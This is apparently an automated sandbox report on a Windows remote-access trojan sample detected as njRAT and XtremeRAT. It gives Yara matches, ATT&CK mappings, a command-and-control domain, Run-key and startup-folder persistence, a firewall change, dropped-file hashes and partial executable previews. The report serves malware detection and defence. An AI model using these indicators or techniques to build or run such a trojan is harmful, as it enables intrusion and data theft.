                Source: Yara match File source: 19.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 20.0.System.exe.240000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 4.0.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 16.0.System.exe.d50000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 20.2.System.exe.240000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 4.2.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 8.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000014.00000002.373443216.0000000000242000.00000002.00020000.sdmp, type: MEMORY
                Source: Yara match File source: 00000010.00000002.338283544.0000000000D52000.00000002.00020000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000000.299745785.00000000003E2000.00000002.00020000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.557860043.00000000003E2000.00000002.00020000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000000.295421440.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000003.295553833.00000000007A2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match File source: 00000013.00000000.343912996.00000000003E2000.00000002.00020000.sdmp, type: MEMORY
                Source: Yara match File source: 00000010.00000000.326269986.0000000000D52000.00000002.00020000.sdmp, type: MEMORY
                Source: Yara match File source: 00000014.00000000.361347637.0000000000242000.00000002.00020000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.300093433.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000003.295774602.000000000079A000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match File source: 00000013.00000002.355829815.00000000003E2000.00000002.00020000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.559691939.00000000029E1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: 7FW4ce2RDy.exe PID: 6908, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: 562Server.exe PID: 4472, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: System.exe PID: 5712, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: System.exe PID: 6552, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: System.exe PID: 3156, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: System.exe PID: 6872, type: MEMORYSTR
                Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe, type: DROPPED
                Source: Yara match File source: C:\Windows\SysWOW64\562Server.exe, type: DROPPED
                Source: Yara match File source: C:\Users\user\AppData\Local\Temp\System.exe, type: DROPPED

                Remote Access Functionality:

                Detected njRat
                Source: 562Server.exe.0.dr, OK.cs .Net Code: njRat config detected
                Source: System.exe.4.dr, OK.cs .Net Code: njRat config detected
                Source: 4.2.562Server.exe.1d0000.0.unpack, OK.cs .Net Code: njRat config detected
                Source: 4.0.562Server.exe.1d0000.0.unpack, OK.cs .Net Code: njRat config detected
                Source: 301b5fcf8ce2fab8868e80b6c1f912fe.exe.8.dr, OK.cs .Net Code: njRat config detected
                Source: 8.0.System.exe.3e0000.0.unpack, OK.cs .Net Code: njRat config detected
                Source: 8.2.System.exe.3e0000.0.unpack, OK.cs .Net Code: njRat config detected
                Source: 16.0.System.exe.d50000.0.unpack, OK.cs .Net Code: njRat config detected
                Source: 16.2.System.exe.d50000.0.unpack, OK.cs .Net Code: njRat config detected
                Source: 19.0.System.exe.3e0000.0.unpack, OK.cs .Net Code: njRat config detected
                Source: 19.2.System.exe.3e0000.0.unpack, OK.cs .Net Code: njRat config detected
                Source: 20.2.System.exe.240000.0.unpack, OK.cs .Net Code: njRat config detected
                Source: 20.0.System.exe.240000.0.unpack, OK.cs .Net Code: njRat config detected
                Source: Yara matchFile source: Process Memory Space: System.exe PID: 6872, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe, type: DROPPED
                Source: Yara matchFile source: C:\Windows\SysWOW64\562Server.exe, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\System.exe, type: DROPPED

                Mitre Att&ck Matrix

                Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                Replication Through Removable Media1 | Native API1 | Startup Items1 | Startup Items1 | Disable or Modify Tools21 | Input Capture231 | System Time Discovery1 | Replication Through Removable Media1 | Archive Collected Data1 | Exfiltration Over Alternative Protocol1 | Ingress Tool Transfer1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                Default Accounts | Scheduled Task/Job | Registry Run Keys / Startup Folder221 | Process Injection612 | Deobfuscate/Decode Files or Information1 | LSASS Memory | Peripheral Device Discovery1 | Remote Desktop Protocol | Input Capture231 | Exfiltration Over Bluetooth | Encrypted Channel1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                Domain Accounts | At (Linux) | Logon Script (Windows) | Registry Run Keys / Startup Folder221 | Obfuscated Files or Information21 | Security Account Manager | File and Directory Discovery2 | SMB/Windows Admin Shares | Clipboard Data2 | Automated Exfiltration | Remote Access Software2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing111 | NTDS | System Information Discovery24 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol1 | SIM Card Swap |  | Carrier Billing Fraud
                Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading121 | LSA Secrets | Security Software Discovery111 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol211 | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
                Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion31 | Cached Domain Credentials | Process Discovery2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
                External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection612 | DCSync | Virtualization/Sandbox Evasion31 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
                Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Application Window Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
                Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | Remote System Discovery1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction

                Behavior Graph

                Behavior Graph ID: 494416, Sample: 7FW4ce2RDy, Startdate: 30/09/2021, Architecture: WINDOWS, Score: 100

                Start node
                • DNS/IP: windownssystem.ddns.net
                • Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 15 other signatures
                • Started: 7FW4ce2RDy.exe, System.exe, System.exe, System.exe

                7FW4ce2RDy.exe
                • Dropped: C:\Windows\SysWOW64\562Server.exe (PE32); C:\Windows\SysWOW64\562Server.exe.exe (data)
                • Signatures: Installs Xtreme RAT; Contains functionality to inject threads in other processes; Drops executables to the windows directory (C:\Windows) and starts them; 6 other signatures
                • Started: 562Server.exe, svchost.exe, chrome.exe

                562Server.exe
                • Dropped: C:\Users\user\AppData\Local\Temp\System.exe (PE32)
                • Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                • Started: System.exe

                svchost.exe
                • Started: WerFault.exe, WerFault.exe

                System.exe (started by 562Server.exe)
                • DNS/IP: windownssystem.ddns.net
                • Dropped: C:\...\301b5fcf8ce2fab8868e80b6c1f912fe.exe (PE32)
                • Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Protects its processes via BreakOnTermination flag; 5 other signatures
                • Started: netsh.exe

                netsh.exe
                • Started: conhost.exe

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                Source | Detection | Scanner | Label
                7FW4ce2RDy.exe | 84% | Virustotal |
                7FW4ce2RDy.exe | 93% | ReversingLabs | Win32.Backdoor.XtremeRAT
                7FW4ce2RDy.exe | 100% | Avira | TR/Agent.ssnsz
                7FW4ce2RDy.exe | 100% | Joe Sandbox ML |

                Dropped Files

                Source | Detection | Scanner | Label
                C:\Users\user\AppData\Local\Temp\System.exe | 100% | Avira | TR/ATRAPS.Gen
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe | 100% | Avira | TR/ATRAPS.Gen
                C:\Windows\SysWOW64\562Server.exe | 100% | Avira | TR/ATRAPS.Gen
                C:\Users\user\AppData\Local\Temp\System.exe | 100% | Joe Sandbox ML |
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe | 100% | Joe Sandbox ML |
                C:\Windows\SysWOW64\562Server.exe | 100% | Joe Sandbox ML |
                C:\Users\user\AppData\Local\Temp\System.exe | 95% | ReversingLabs | ByteCode-MSIL.Backdoor.Bladabhindi
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe | 95% | ReversingLabs | ByteCode-MSIL.Backdoor.Bladabhindi
                C:\Windows\SysWOW64\562Server.exe | 95% | ReversingLabs | ByteCode-MSIL.Backdoor.Bladabhindi

                Unpacked PE Files

                Source | Detection | Scanner | Label
                4.2.562Server.exe.1d0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen
                1.2.svchost.exe.10000000.0.unpack | 100% | Avira | TR/Agent.ssnsz
                16.0.System.exe.d50000.0.unpack | 100% | Avira | TR/ATRAPS.Gen
                0.0.7FW4ce2RDy.exe.10000000.0.unpack | 100% | Avira | TR/Agent.ssnsz
                20.2.System.exe.240000.0.unpack | 100% | Avira | TR/ATRAPS.Gen
                20.0.System.exe.240000.0.unpack | 100% | Avira | TR/ATRAPS.Gen
                8.0.System.exe.3e0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen
                4.0.562Server.exe.1d0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen
                16.2.System.exe.d50000.0.unpack | 100% | Avira | TR/ATRAPS.Gen
                8.2.System.exe.3e0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen
                19.0.System.exe.3e0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen
                0.2.7FW4ce2RDy.exe.10000000.0.unpack | 100% | Avira | TR/Agent.ssnsz
                19.2.System.exe.3e0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen
                1.0.svchost.exe.10000000.0.unpack | 100% | Avira | TR/Agent.ssnsz

                Domains

                Source | Detection | Scanner | Label
                windownssystem.ddns.net | 1% | Virustotal |

                URLs

                Source | Detection | Scanner | Label
                windownssystem.ddns.net | 0% | Avira URL Cloud | safe

                Domains and IPs

                Contacted Domains

                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                windownssystem.ddns.net | unknown | unknown | true |  | unknown

                Contacted URLs

                Name | Malicious | Antivirus Detection | Reputation
                windownssystem.ddns.net | true | Avira URL Cloud: safe | unknown

                Contacted IPs

                No contacted IP infos

                General Information

                Joe Sandbox Version:33.0.0 White Diamond
                Analysis ID:494416
                Start date:30.09.2021
                Start time:16:42:28
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 11m 9s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:7FW4ce2RDy (renamed file extension from none to exe)
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:37
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.adwa.spyw.evad.winEXE@17/7@34/0
                EGA Information:Failed
                HDC Information:
                • Successful, ratio: 15.8% (good quality ratio 13.8%)
                • Quality average: 56.4%
                • Quality standard deviation: 28.1%
                HCA Information:
                • Successful, ratio: 79%
                • Number of executed functions: 137
                • Number of non-executed functions: 157
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                Warnings:
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                • Excluded IPs from analysis (whitelisted): 2.22.152.11, 23.54.113.53, 20.199.120.85, 20.199.120.151, 20.82.210.154, 20.199.120.182, 23.0.174.200, 23.0.174.185, 20.54.110.249, 40.112.88.60, 23.10.249.43, 23.10.249.26, 20.50.102.62
                • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, storeedgefd.dsx.mp.microsoft.com, client.wns.windows.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, storeedgefd.dsx.mp.microsoft.com.edgekey.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, e16646.dscg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                • Not all processes were analyzed; the report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                Time | Type | Description
                16:43:33 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 301b5fcf8ce2fab8868e80b6c1f912fe "C:\Users\user\AppData\Local\Temp\System.exe" ..
                16:43:41 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run 301b5fcf8ce2fab8868e80b6c1f912fe "C:\Users\user\AppData\Local\Temp\System.exe" ..
                16:43:50 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 301b5fcf8ce2fab8868e80b6c1f912fe "C:\Users\user\AppData\Local\Temp\System.exe" ..
                16:43:58 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASN

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\562Server.exe.log
                Process:C:\Windows\SysWOW64\562Server.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):525
                Entropy (8bit):5.2874233355119316
                Encrypted:false
                SSDEEP:12:Q3LaJU20NaL10Ug+9Yz9t0U29hJ5g1B0U2ukyrFk7v:MLF20NaL3z2p29hJ5g522r0
                MD5:80EFBEC081D7836D240503C4C9465FEC
                SHA1:6AF398E08A359457083727BAF296445030A55AC3
                SHA-256:C73F730EB5E05D15FAD6BE10AB51FE4D8A80B5E88B89D8BC80CC1DF09ACE1523
                SHA-512:DEC3B1D9403894418AFD4433629CA6476C7BD359963328D17B93283B52EEC18B3725D2F02F0E9A142E705398DDDCE244D53829570E9DE1A87060A7DABFDCE5B3
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..
                C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\System.exe.log
                Process:C:\Users\user\AppData\Local\Temp\System.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):525
                Entropy (8bit):5.2874233355119316
                Encrypted:false
                SSDEEP:12:Q3LaJU20NaL10Ug+9Yz9t0U29hJ5g1B0U2ukyrFk7v:MLF20NaL3z2p29hJ5g522r0
                MD5:80EFBEC081D7836D240503C4C9465FEC
                SHA1:6AF398E08A359457083727BAF296445030A55AC3
                SHA-256:C73F730EB5E05D15FAD6BE10AB51FE4D8A80B5E88B89D8BC80CC1DF09ACE1523
                SHA-512:DEC3B1D9403894418AFD4433629CA6476C7BD359963328D17B93283B52EEC18B3725D2F02F0E9A142E705398DDDCE244D53829570E9DE1A87060A7DABFDCE5B3
                Malicious:false
                Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..
                C:\Users\user\AppData\Local\Temp\System.exe
                Process:C:\Windows\SysWOW64\562Server.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):29696
                Entropy (8bit):5.5773592840887005
                Encrypted:false
                SSDEEP:384:2JPqvANl7TxTD+VF2dbofPauxnaIuN15708COmqDk9jeHqGBsbh0w4wlAokw9Ohi:2eu75oa4fuTC8cqojeVBKh0p29SgRwW
                MD5:B207157C9F171556BF4D240C14AABA0E
                SHA1:958F8D31B526EE0DB15F40CEE2963A6E0F84D627
                SHA-256:0B642220D2D6A965C347C2DC4B5FDE794194C072A8621455EC3DCF68CBA7F610
                SHA-512:5FE7D96EF9D8619AD180E76DE3400D201614BF733F40095610BC0F24EA9C4747A4B05F398A046823A7E20A9410C11FF3CC177313999D53D236B98D5874805296
                Malicious:true
                Yara Hits:
                • Rule: RAT_njRat, Description: Detects njRAT, Source: C:\Users\user\AppData\Local\Temp\System.exe, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Local\Temp\System.exe, Author: Joe Security
                • Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Local\Temp\System.exe, Author: Brian Wallace @botnet_hunter
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 95%
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.V.................l............... ........@.. ....................................@.....................................S.......@............................................................................ ............... ..H............text....k... ...l.................. ..`.rsrc...@............n..............@..@.reloc...............r..............@..B........................H.......(Z...0......9....................................................0..........r...p.....r...p...........r...p.....r5..p.....r?..p.....r...p.....r...p.....r...p.....r...p(.........r...p(.........r...p(.........r...p(.........(....s.........s.........r...p.................r...p...........s......... ..............r=..p.....*....0..;.......~....o....o....r?..p~....(.....o.....o......%(.....(......*.........,,.......0..L.......~....o....o....r?..p~....(....o.....r=..po....(.
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe
                Process:C:\Users\user\AppData\Local\Temp\System.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):29696
                Entropy (8bit):5.5773592840887005
                Encrypted:false
                SSDEEP:384:2JPqvANl7TxTD+VF2dbofPauxnaIuN15708COmqDk9jeHqGBsbh0w4wlAokw9Ohi:2eu75oa4fuTC8cqojeVBKh0p29SgRwW
                MD5:B207157C9F171556BF4D240C14AABA0E
                SHA1:958F8D31B526EE0DB15F40CEE2963A6E0F84D627
                SHA-256:0B642220D2D6A965C347C2DC4B5FDE794194C072A8621455EC3DCF68CBA7F610
                SHA-512:5FE7D96EF9D8619AD180E76DE3400D201614BF733F40095610BC0F24EA9C4747A4B05F398A046823A7E20A9410C11FF3CC177313999D53D236B98D5874805296
                Malicious:true
                Yara Hits:
                • Rule: RAT_njRat, Description: Detects njRAT, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe, Author: Joe Security
                • Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe, Author: Brian Wallace @botnet_hunter
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 95%
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.V.................l............... ........@.. ....................................@.....................................S.......@............................................................................ ............... ..H............text....k... ...l.................. ..`.rsrc...@............n..............@..@.reloc...............r..............@..B........................H.......(Z...0......9....................................................0..........r...p.....r...p...........r...p.....r5..p.....r?..p.....r...p.....r...p.....r...p.....r...p(.........r...p(.........r...p(.........r...p(.........(....s.........s.........r...p.................r...p...........s......... ..............r=..p.....*....0..;.......~....o....o....r?..p~....(.....o.....o......%(.....(......*.........,,.......0..L.......~....o....o....r?..p~....(....o.....r=..po....(.
                C:\Windows\SysWOW64\562Server.exe
                Process:C:\Users\user\Desktop\7FW4ce2RDy.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):29696
                Entropy (8bit):5.5773592840887005
                Encrypted:false
                SSDEEP:384:2JPqvANl7TxTD+VF2dbofPauxnaIuN15708COmqDk9jeHqGBsbh0w4wlAokw9Ohi:2eu75oa4fuTC8cqojeVBKh0p29SgRwW
                MD5:B207157C9F171556BF4D240C14AABA0E
                SHA1:958F8D31B526EE0DB15F40CEE2963A6E0F84D627
                SHA-256:0B642220D2D6A965C347C2DC4B5FDE794194C072A8621455EC3DCF68CBA7F610
                SHA-512:5FE7D96EF9D8619AD180E76DE3400D201614BF733F40095610BC0F24EA9C4747A4B05F398A046823A7E20A9410C11FF3CC177313999D53D236B98D5874805296
                Malicious:true
                Yara Hits:
                • Rule: RAT_njRat, Description: Detects njRAT, Source: C:\Windows\SysWOW64\562Server.exe, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Windows\SysWOW64\562Server.exe, Author: Joe Security
                • Rule: njrat1, Description: Identify njRat, Source: C:\Windows\SysWOW64\562Server.exe, Author: Brian Wallace @botnet_hunter
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 95%
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.V.................l............... ........@.. ....................................@.....................................S.......@............................................................................ ............... ..H............text....k... ...l.................. ..`.rsrc...@............n..............@..@.reloc...............r..............@..B........................H.......(Z...0......9....................................................0..........r...p.....r...p...........r...p.....r5..p.....r?..p.....r...p.....r...p.....r...p.....r...p(.........r...p(.........r...p(.........r...p(.........(....s.........s.........r...p.................r...p...........s......... ..............r=..p.....*....0..;.......~....o....o....r?..p~....(.....o.....o......%(.....(......*.........,,.......0..L.......~....o....o....r?..p~....(....o.....r=..po....(.
                C:\Windows\SysWOW64\562Server.exe.exe
                Process:C:\Users\user\Desktop\7FW4ce2RDy.exe
                File Type:data
                Category:dropped
                Size (bytes):4
                Entropy (8bit):1.5
                Encrypted:false
                SSDEEP:3:j:j
                MD5:A2CE4C7B743725199DA04033B5B57469
                SHA1:1AE348EAFA097AB898941EAFE912D711A407DA10
                SHA-256:0FFF86057DCFB3975C8BC44459740BA5FFB43551931163538DF3F39A6BB991BC
                SHA-512:23BD59F57B16CD496B550C1BBA09EB3F9A9DFE764EA03470E3CC43E4D0B4CA415D239772E4A9B930749E88CEAD9A7EC4B0A77D0DD310E61D8C6521AE6FF278B0
                Malicious:true
                Preview: O.K.
                \Device\ConDrv
                Process:C:\Windows\SysWOW64\netsh.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):313
                Entropy (8bit):4.971939296804078
                Encrypted:false
                SSDEEP:6:/ojfKsUTGN8Ypox42k9L+DbGMKeQE+vigqAZs2E+AYeDPO+Yswyha:wjPIGNrkHk9iaeIM6ADDPOHyha
                MD5:689E2126A85BF55121488295EE068FA1
                SHA1:09BAAA253A49D80C18326DFBCA106551EBF22DD6
                SHA-256:D968A966EF474068E41256321F77807A042F1965744633D37A203A705662EC25
                SHA-512:C3736A8FC7E6573FA1B26FE6A901C05EE85C55A4A276F8F569D9EADC9A58BEC507D1BB90DBF9EA62AE79A6783178C69304187D6B90441D82E46F5F56172B5C5C
                Malicious:false
                Preview: ..IMPORTANT: Command executed successfully...However, "netsh firewall" is deprecated;..use "netsh advfirewall firewall" instead...For more information on using "netsh advfirewall firewall" commands..instead of "netsh firewall", see KB article 947709..at https://go.microsoft.com/fwlink/?linkid=121488 .....Ok.....

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
                Entropy (8bit):2.825247174180131
                TrID:
                • Win32 Executable (generic) a (10002005/4) 98.97%
                • InstallShield setup (43055/19) 0.43%
                • UPX compressed Win32 Executable (30571/9) 0.30%
                • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                • Generic Win/DOS Executable (2004/3) 0.02%
                File name:7FW4ce2RDy.exe
                File size:354304
                MD5:776211eed31b6a8ea3539ac1d822362c
                SHA1:b18225f3217536c802d43d9e4a0ac8ac22a90109
                SHA256:f32fb1af5db650065e6e1d02ade5506e6c0903e4bbc9ff6ff2fbf94bef6ffba4
                SHA512:c067fd43414e3ccb87cef9b707125634be0ba5f0f6aa6e13a63de791ff2cb4a1b0ebb63fd174a5940f4e6aab0c1e349977da6e2eda633bd64ec1502a38f3d3f4
                SSDEEP:1536:+Dsq+QV4rObAdXWpf/y+keoYTcMD62/OxwA1SFGt:Z44rj/yo326AOiA1SMt
                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                File Icon

                Icon Hash:a2a0b496b2caca72

                Static PE Info

                General

                Entrypoint:0x1000d0f4
                Entrypoint Section:UPX0
                Digitally signed:false
                Imagebase:0x10000000
                Subsystem:windows gui
                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
                DLL Characteristics:
                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:d98325588570403f283a229c660142db

                Entrypoint Preview

                Instruction
                push ebp
                mov ebp, esp
                mov ecx, 000002BCh
                push 00000000h
                push 00000000h
                dec ecx
                jne 00007FB3BCC20C8Bh
                push ebx
                push esi
                push edi
                mov eax, 1000D030h
                call 00007FB3BCC18869h
                mov edi, 1000F834h
                xor eax, eax
                push ebp
                push 1000D759h
                push dword ptr fs:[eax]
                mov dword ptr fs:[eax], esp
                mov eax, 1000D0D0h
                call 00007FB3BCC16B8Ch
